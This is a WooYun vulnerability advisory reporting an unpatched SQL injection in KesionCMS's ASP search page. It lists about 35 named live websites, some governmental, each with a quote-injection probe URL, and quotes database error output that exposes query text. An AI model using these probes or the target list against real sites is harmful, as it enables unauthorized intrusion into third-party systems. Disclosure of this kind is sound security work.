当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161833

漏洞标题:KesionCMS ASP版一处SQL注入

相关厂商:厦门科汛软件有限公司 

漏洞作者: 路人甲

提交时间:2015-12-17 10:24

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

搜索型注入

详细说明:

很明显的一处注入;但是好像需要闭合,先提交了证明下注入,闭合就交给大牛完成了

http://www.jfdwy.com/item/?c-5,key-1%27.html
http://www.bqjujia.com/Item/?c-5,key-1%27.html
http://www.gzisc.com.cn/item/?c-5,key-1%27.html
http://www.jzlj.org.cn/item/?c-5,key-1%27.html
http://www.jinlaima.com/Item/?c-5,key-1%27.html
http://jiadewd.com/Item/?c-5,key-1%27.html
http://www.recende.com/item/?c-5,key-1%27.html
http://www.gdtgw.cn/item/?c-5,key-1%27.html
http://www.gmshouji.com/Item/?c-5,key-1%27.html
http://210.47.176.3/page/depart/yjsy/item/?c-5,key-1%27.html
http://www.jdznj.com/item/?c-5,key-1%27.html
http://www.lcsflw.com/item/?c-5,key-1%27.html
http://www.cdsyz.com/item/?c-5,key-1%27.html
http://www.cqgmy.cn/item/?c-5,key-1%27.html
http://www.njyhx.com/item/?c-5,key-1%27.html
http://www.hecelaw.com/item/?c-5,key-1%27.html
http://www.lsjrd.gov.cn/item/?c-5,key-1%27.html
http://www.lfkj.org.cn/item/?c-5,key-1%27.html
http://www.qdzhijia.com/item/?c-5,key-1%27.html
http://www.gushiyouth.org.cn/item/?c-5,key-1%27.html
http://www.xxqzgzb.gov.cn/item/?c-5,key-1%27.html
http://www.hnxddq.cn/item/?c-5,key-1%27.html
http://www.recende.com/item/?c-5,key-1%27.html
http://www.xfwang.cn//item/?c-5,key-1%27.html
http://www.ctyygs.com//item/?c-5,key-1%27.html
http://www.lcsflw.com//item/?c-5,key-1%27.html
http://www.yqhy.gov.cn//item/?c-5,key-1%27.html
http://www.cqgmy.cn//item/?c-5,key-1%27.html
http://www.sxpsxx.com/item/?c-5,key-1%27.html
http://www.xtss.com.cn//item/?c-5,key-1%27.html
http://www.jxdjw.gov.cn//item/?c-5,key-1%27.html
http://www.srxdx.com/item/?c-5,key-1%27.html
http://www.dggraduate.com//item/?c-5,key-1%27.html
http://www.dfttkf.com//item/?c-5,key-1%27.html
http://www.jdznj.com//item/?c-5,key-1%27.html


漏洞证明:

http://www.recende.com/item/?c-5,key-1%27.html
Microsoft JET Database Engine 错误 '80040e14'
语法错误 在查询表达式 'Verific=1 and deltf=0 And (Title Like '%1'%') Order by ID Desc' 中。
/item/Index.asp,行 618

1.jpg


http://www.jxdjw.gov.cn//item/?c-5,key-1%27.html
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 ') Order by ID Desc' 后的引号不完整。
/item/index.asp,行 598

2.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)